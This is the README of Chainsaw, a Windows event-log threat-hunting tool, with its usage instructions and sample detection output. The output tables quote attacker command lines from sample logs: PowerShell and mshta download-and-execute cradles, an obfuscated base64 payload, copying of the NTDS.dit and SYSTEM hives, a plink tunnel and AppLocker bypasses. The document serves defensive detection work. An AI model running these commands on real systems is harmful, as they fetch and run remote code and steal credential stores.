Chainsaw provides a powerful βfirst-responseβ capability to quickly identify threats within Windows event logs. It offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in detection logic and via support for Sigma detection rules.
- π Search and extract event log records by event IDs, string matching, and regex patterns
- π― Hunt for threats using Sigma detection rules and custom built-in detection logic
- β‘ Lightning fast, written in rust, wrapping the EVTX parser library by @OBenamram
- π₯ Document tagging (detection logic matching) provided by the TAU Engine Library
- π Output in an ASCII table format, CSV format, or JSON format
Using the --rules and --mapping parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported:
| Event Type | Event ID |
|---|---|
| Process Creation (Sysmon) | 1 |
| Network Connections (Sysmon) | 3 |
| Image Loads (Sysmon) | 7 |
| File Creation (Sysmon) | 11 |
| Registry Events (Sysmon) | 13 |
| Powershell Script Blocks | 4104 |
| Process Creation | 4688 |
| Scheduled Task Creation | 4698 |
| Service Creation | 7045 |
- Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
- Detection of key event logs being cleared, or the event log service being stopped
- Users being created or added to sensitive user groups
- Brute-force of local user accounts
- RDP Logins
You can specify the --lateral-all flag to chainsaw to also parse and extract additional 4624 logon types (network logons, service, batch etc.) relating to potential lateral movement that may be interesting for investigations.
You can find pre-compiled versions of chainsaw in the releases section of this Github repo, or you can clone the repo (and the submodules) by running:
git clone --recurse-submodules https://github.com/countercept/chainsaw.git
You can then compile the code yourself by running: cargo build --release. Once the build has finished, you will find a copy of the compiled binary in the target/release folder.
Make sure to build with the --release flag as this will ensure significantly faster execution time.
If you want to quickly see what Chainsaw looks like when it runs, you can use the command:
./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml
When using Sigma rule detection logic, Chainsaw requires a 'mapping file' to tell it which event IDs to check, what fields are important, and which fields to output in the table view. The included sigma mapping in the "mapping_files" directory already supports most of the key Event IDs, but if you want to add support for additional event IDs you can use this mapping file as a template.
Help Output:
USAGE:
chainsaw search [FLAGS] [OPTIONS] <evtx-path>
FLAGS:
-i, --case_insensitive
-h, --help Prints help information
-V, --version Prints version information
OPTIONS:
-e, --event <event-id>
-o, --output <output-file>
-r, --regex_search <search-regex>
-s, --string <search-string>
ARGS:
<evtx-path>
Search all .evtx files in the evtx_files dir for event id 4624
./chainsaw search ~/Downloads/evtx_files/ -e 4624
Search a specific evtx log for logon events containing the string "bob" (case insensitive)
./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -s "bob" -i
Search a specific evtx log for logon events, with a matching regex pattern. Save results to file
./chainsaw search ~/Downloads/evtx_files/security.evtx -e 4624 -r "bob[a-zA-Z]" -o out.txt
Help Output:
USAGE:
chainsaw hunt [FLAGS] [OPTIONS] <evtx-path>
FLAGS:
--csv
Save hunt output to individual CSV file, otherwise output in a table format
--no-builtin
Do not use inbuilt detection logic, only use the specified rules for detection
--full
Show full event output, otherwise output is trunctated to improve readability
-h, --help
Prints help information
--lateral-all
List additional 4624 events potentially relating to lateral movement
-V, --version
Prints version information
OPTIONS:
--col-width <col-width>
Change the maximum column width (default 40). Use this option if the table output is un-readable [default:
40]
--json <json-output>
Save the full event log and associated detections to disk in a JSON format to the specified path
-m, --mapping <mapping-path>
Specify the mapping file to use to with the specified detection rules. Required when using the --rule/-r
flag
-r, --rules <rules-path>
Specify a directory containing detection rules to use. All files matching *.yml will be used
ARGS:
<evtx-path>
Specify an EVTX file, or a directory containing the EVTX files to search. If you specify a directory, all
files matching *.evtx will be used.
Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\"
Hunt through all event logs in a specific path, show additional information relating to potential lateral movement, and save results to individual CSV files
-> % ./chainsaw hunt evtx_attack_samples/ --lateral-all --csv
ββββββββββ βββ ββββββ βββββββ βββββββββββ ββββββ βββ βββ
βββββββββββ βββββββββββββββββββ ββββββββββββββββββββββ βββ
βββ βββββββββββββββββββββββββ ββββββββββββββββββββββ ββ βββ
βββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββ ββββββ βββββββββ βββββββββββββββββ βββββββββββββ
ββββββββββ ββββββ βββββββββ ββββββββββββββββ βββ ββββββββ
By F-Secure Countercept (Author: @FranticTyping)
[+] Found 20 EVTX files
[!] Continuing without Detection rules, no path provided
[+] Saving results to CSV files
[+] Created chainsaw_2021-06-28T20-42-25/system_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/event_log_service_stopped.csv
[+] Created chainsaw_2021-06-28T20-42-25/new_user_created.csv
[+] Created chainsaw_2021-06-28T20-42-25/4624_logins.csv
[+] Created chainsaw_2021-06-28T20-42-25/user_added_to_interesting_group.csv
[+] Created chainsaw_2021-06-28T20-42-25/audit_log_was_cleared.csv
[+] Created chainsaw_2021-06-28T20-42-25/account_brute_forcing.csv
[+] 18 Detections found
Hunt through all event logs in a specific path, apply detection logic and TAU rules from the specified path
-> % ./chainsaw hunt evtx_attack_samples/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml
ββββββββββ βββ ββββββ βββββββ βββββββββββ ββββββ βββ βββ
βββββββββββ βββββββββββββββββββ ββββββββββββββββββββββ βββ
βββ βββββββββββββββββββββββββ ββββββββββββββββββββββ ββ βββ
βββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββ ββββββ βββββββββ βββββββββββββββββ βββββββββββββ
ββββββββββ ββββββ βββββββββ ββββββββββββββββ βββ ββββββββ
By F-Secure Countercept (Author: @FranticTyping)
[+] Found 266 EVTX files
[+] Loaded 734 detection rules (74 were not loadeD)
[+] Printing results to screen
[+] Hunting: [========================================] 100%
[+] Detection: Security audit log was cleared
βββββββββββββββββββββββ¬βββββββ¬ββββββββββββββββββββββββββββββββββββ¬ββββββββββββββββββ
β system_time β id β computer β subject_user β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2019-01-20 07:00:50 β 1102 β "WIN-77LTAPHIQ1R.example.corp" β "Administrator" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2019-01-20 07:29:57 β 1102 β "WIN-77LTAPHIQ1R.example.corp" β "Administrator" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2019-11-15 08:19:02 β 1102 β "alice.insecurebank.local" β "bob" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-07-22 20:29:27 β 1102 β "01566s-win16-ir.threebeesco.com" β "a-jbrown" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-09-02 11:47:39 β 1102 β "01566s-win16-ir.threebeesco.com" β "a-jbrown" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-09-15 18:04:36 β 1102 β "MSEDGEWIN10" β "IEUser" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-09-15 19:28:17 β 1102 β "01566s-win16-ir.threebeesco.com" β "a-jbrown" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-09-17 10:57:37 β 1102 β "01566s-win16-ir.threebeesco.com" β "a-jbrown" β
βββββββββββββββββββββββΌβββββββΌββββββββββββββββββββββββββββββββββββΌββββββββββββββββββ€
β 2020-09-23 16:49:41 β 1102 β "01566s-win16-ir.threebeesco.com" β "Administrator" β
βββββββββββββββββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββ
[+] Detection: Suspicious Command Line
βββββββββββββββββββββββ¬βββββββ¬βββββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.CommandLine β process_name β
βββββββββββββββββββββββΌβββββββΌβββββββββββββββββββββββββββββββΌββββββββββββββββββββββΌββββββββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββ€
β 2019-02-13 18:03:28 β 4688 β β£ Exfiltration and Tunneling β "PC01.example.corp" β <empty> β C:\Users\user01\Desktop\plink.exe β
β β β Tools Execution β β β β
βββββββββββββββββββββββ΄βββββββ΄βββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ΄ββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββββββββββββββ
[+] Detection: Suspicious Process Creation
βββββββββββββββββββββββ¬βββββ¬βββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β system_time β id β detection_rules β computer_name β Event.EventData.Image β command_line β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-02-16 10:02:21 β 1 β β£ Exfiltration and Tunneling β "PC01.example.corp" β C:\Users\IEUser\Desktop\plink.exe β plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 β
β β β Tools Execution β β β .0.0.2:3389 -l test -pw test β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-03-17 20:18:09 β 1 β β£ Netsh Port or Application β "PC04.example.corp" β C:\Windows\System32\netsh.exe β netsh advfirewall firewall add rule name="Remote D β
β β β Allowed β β β esktop" dir=in protocol=tcp localport=3389 profile β
β β β β£ Netsh RDP Port Opening β β β =any action=allow β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-03-17 20:20:17 β 1 β β£ File or Folder Permissions β "PC04.example.corp" β C:\Windows\System32\icacls.exe β "C:\Windows\System32\icacls.exe" C:\Windows\System β
β β β Modifications β β β 32\termsrv.dll /grant %%username%%:F β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-03-17 20:20:17 β 1 β β£ File or Folder Permissions β "PC04.example.corp" β C:\Windows\System32\icacls.exe β "C:\Windows\System32\icacls.exe" C:\Windows\System β
β β β Modifications β β β 32\termsrv.dll /grant *S-1-1-0:(F) β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-27 18:47:00 β 1 β β£ Execution from Suspicious β "IEWIN7" β C:\Users\Public\KeeFarce.exe β KeeFarce.exe β
β β β Folder β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-29 20:59:21 β 1 β β£ Non Interactive PowerShell β "IEWIN7" β C:\Windows\System32\WindowsPowerShell\v1.0\powersh β "C:\Windows\System32\WindowsPowerShell\v1.0\powers β
β β β β β ell.exe β hell.exe" -s -NoLogo -NoProfile β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-29 20:59:22 β 1 β β£ Local Accounts Discovery β "IEWIN7" β C:\Windows\System32\whoami.exe β "C:\Windows\system32\whoami.exe" /all β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-30 07:46:15 β 1 β β£ Meterpreter or Cobalt β "IEWIN7" β C:\Windows\System32\cmd.exe β cmd.exe /c echo msdhch > \\.\pipe\msdhch β
β β β Strike Getsystem Service β β β β
β β β Start β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-30 20:26:52 β 1 β β£ Mimikatz Command Line β "IEWIN7" β C:\Windows\System32\cmd.exe β C:\Windows\system32\cmd.exe /b /c start /b /min po β
β β β β£ FromBase64String Command β β β wershell.exe -nop -w hidden -noni -c "if([IntPtr]: β
β β β Line β β β :Size -eq 4){$b='powershell.exe'}else{$b=$env:wind β
β β β β£ Curl Start Combination β β β ir+'\syswow64\WindowsPowerShell\v1.0\powershell.ex β
β β β β β β e'};$s=New-Object System.Diagnostics.ProcessStartI β
β β β β β β nfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hid β
β β β β β β den -c &([scriptblock]::create((New-Object IO.Stre β
β β β β β β amReader(New-Object IO.Compression.GzipStream((New β
β β β β β β -Object IO.MemoryStream(,[Convert]::FromBase64Stri β
β β β β β β ng(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVu β
β β β β β β jVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7M β
β β β β β β z33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5 β
β β β β β β Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OS β
β β β β β β TiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaM β
β β β β β β irk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEn β
β β β β β β tiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/ β
β β β β β β Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrR β
β β β β β β ItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/meb β
β β β β β β DLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/ β
β β β β β β O35y7GUVWdyP6kiEwOpsexgQCk7s8pg... β
β β β β β β β
β β β β β β (use --full to show all content) β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-04-30 20:26:52 β 1 β β£ Mimikatz Command Line β "IEWIN7" β C:\Windows\System32\WindowsPowerShell\v1.0\powersh β powershell.exe -nop -w hidden -noni -c "if([IntPtr β
β β β β£ FromBase64String Command β β ell.exe β ]::Size -eq 4){$b='powershell.exe'}else{$b=$env:wi β
β β β Line β β β ndir+'\syswow64\WindowsPowerShell\v1.0\powershell. β
β β β β£ Non Interactive PowerShell β β β exe'};$s=New-Object System.Diagnostics.ProcessStar β
β β β β β β tInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w h β
β β β β β β idden -c &([scriptblock]::create((New-Object IO.St β
β β β β β β reamReader(New-Object IO.Compression.GzipStream((N β
β β β β β β ew-Object IO.MemoryStream(,[Convert]::FromBase64St β
β β β β β β ring(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJ β
β β β β β β VujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM β
β β β β β β 7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQh β
β β β β β β z5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9 β
β β β β β β OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdF β
β β β β β β aMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkv β
β β β β β β EntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJv β
β β β β β β U/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEiv β
β β β β β β rRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/m β
β β β β β β ebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz β
β β β β β β 2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE β
β β β β β β 0148Sosy+wCrl3Gbhx9ZapgqKfP+0Bd... β
β β β β β β β
β β β β β β (use --full to show all content) β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-19 15:11:26 β 1 β β£ Shadow Copies Creation β "MSEDGEWIN10" β C:\Windows\System32\vssadmin.exe β vssadmin.exe create shadow /for=C: β
β β β Using Operating Systems β β β β
β β β Utilities β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-19 15:11:27 β 1 β β£ Copying Sensitive Files β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR β
β β β with Credential Data β β β OOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ β
β β β β β β NTDS.dit C:\Extract\ntds.dit" β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-19 15:11:27 β 1 β β£ Copying Sensitive Files β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALR β
β β β with Credential Data β β β OOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste β
β β β β β β m32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-26 07:39:14 β 1 β β£ HH.exe Execution β "MSEDGEWIN10" β C:\Windows\hh.exe β "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Re β
β β β β β β cord N104F.chm β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-26 07:39:14 β 1 β β£ HTML Help Shell Spawn β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β "C:\Windows\System32\cmd.exe" /c copy /Y C:\Window β
β β β β£ Suspicious Rundll32 Activity β β β s\system32\rundll32.exe %%TEMP%%\out.exe > nul && β
β β β β β β %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApp β
β β β β β β lication ";document.write();h=new%%20ActiveXObject β
β β β β β β ("WinHttp.WinHttpRequest.5.1");h.Open("GET","http: β
β β β β β β //pastebin.com/raw/y2CjnRtH",false);try{h.Send();b β
β β β β β β =h.ResponseText;eval(b);}catch(e){new%%20ActiveXOb β
β β β β β β ject("WScript.Shell").Run("cmd /c taskkill /f /im β
β β β β β β out.exe",0,true);} β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:11:17 β 1 β β£ Suspicious Rundll32 Activity β "MSEDGEWIN10" β C:\Windows\System32\rundll32.exe β "C:\Windows\system32\rundll32.exe" Shell32.dll,Con β
β β β β β β trol_RunDLL "C:\Users\IEUser\Downloads\Invoice@058 β
β β β β β β 2.cpl", β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:11:17 β 1 β β£ Suspicious Call by Ordinal β "MSEDGEWIN10" β C:\Windows\SysWOW64\rundll32.exe β "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\Sys β
β β β β β β WOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\ β
β β β β β β Invoice@0582.cpl", β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:32:58 β 1 β β£ Suspicious Certutil Command β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c certutil -f -decode fi.b64 AllTheThings.dll β
β β β β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:32:59 β 1 β β£ Suspicious Certutil Command β "MSEDGEWIN10" β C:\Windows\System32\certutil.exe β certutil -f -decode fi.b64 AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:03 β 1 β β£ Bitsadmin Download β "MSEDGEWIN10" β C:\Windows\System32\bitsadmin.exe β bitsadmin.exe /transfer "JobName" https://raw.gith β
β β β β β β ubusercontent.com/op7ic/EDR-Testing-Script/master/ β
β β β β β β Payloads/CradleTest.txt "C:\Windows\system32\Defau β
β β β β β β lt_File_Path.ps1" β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:18 β 1 β β£ Mshta JavaScript Execution β "MSEDGEWIN10" β C:\Windows\System32\mshta.exe β mshta.exe javascript:a=GetObject("script:https://r β
β β β β£ Suspicious Rundll32 Activity β β β aw.githubusercontent.com/op7ic/EDR-Testing-Script/ β
β β β β β β master/Payloads/Mshta_calc.sct").Exec();close(); β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:23 β 1 β β£ Encoded PowerShell Command β "MSEDGEWIN10" β C:\Windows\System32\WindowsPowerShell\v1.0\powersh β powershell -c "(New-Object Net.WebClient).Download β
β β β Line β β ell.exe β File('https://raw.githubusercontent.com/op7ic/EDR- β
β β β β£ Non Interactive PowerShell β β β Testing-Script/master/Payloads/CradleTest.txt','De β
β β β β β β fault_File_Path.ps1');IEX((-Join([IO.File]::ReadAl β
β β β β β β lBytes('Default_File_Path.ps1')|ForEach-Object{[Ch β
β β β β β β ar]$_})))" β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:28 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.303 β
β β β β β β 19\regsvcs.exe AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:28 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 β
β β β β β β 27\regsvcs.exe AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:29 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegS β C:\Windows\Microsoft.NET\Framework\v4.0.30319\regs β
β β β β β vcs.exe β vcs.exe AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:29 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.5 β
β β β β β β 0727\regsvcs.exe AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:29 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.3 β
β β β β β β 0319\regsvcs.exe AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2019-07-29 21:33:34 β 1 β β£ Possible Applocker Bypass β "MSEDGEWIN10" β C:\Windows\System32\cmd.exe β cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 β
β β β β β β 27\regasm.exe /U AllTheThings.dll β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-12-04 22:41:04 β 1 β β£ Suspicious Svchost Process β "MSEDGEWIN10" β C:\Windows\System32\svchost.exe β C:\Windows\system32\svchost.exe -k localService -p β
β β β β£ Windows Processes Suspicious β β β -s RemoteRegistry β
β β β Parent Directory β β β β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-12-09 16:52:34 β 1 β β£ Execution from Suspicious β "MSEDGEWIN10" β C:\Users\Public\psexecprivesc.exe β "C:\Users\Public\psexecprivesc.exe" C:\Windows\Sys β
β β β Folder β β β tem32\mspaint.exe β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2020-12-09 16:52:41 β 1 β β£ PsExec Service Start β "MSEDGEWIN10" β C:\Windows\PSEXESVC.exe β C:\Windows\PSEXESVC.exe β
βββββββββββββββββββββββΌβββββΌβββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 2021-01-26 13:21:13 β 1 β β£ Possible Applocker Bypass β "LAPTOP-JU4M3I0E" β C:\Program Files (x86)\Microsoft Visual Studio\201 β C:\Program Files (x86)\Microsoft Visual Studio\201 β
β β β β β 9\Community\MSBuild\Current\Bin\MSBuild.exe β 9\Community\MSBuild\Current\Bin\MSBuild.exe /nolog β
β β β β β β o /nodemode:1 /nodeReuse:true /low:false β
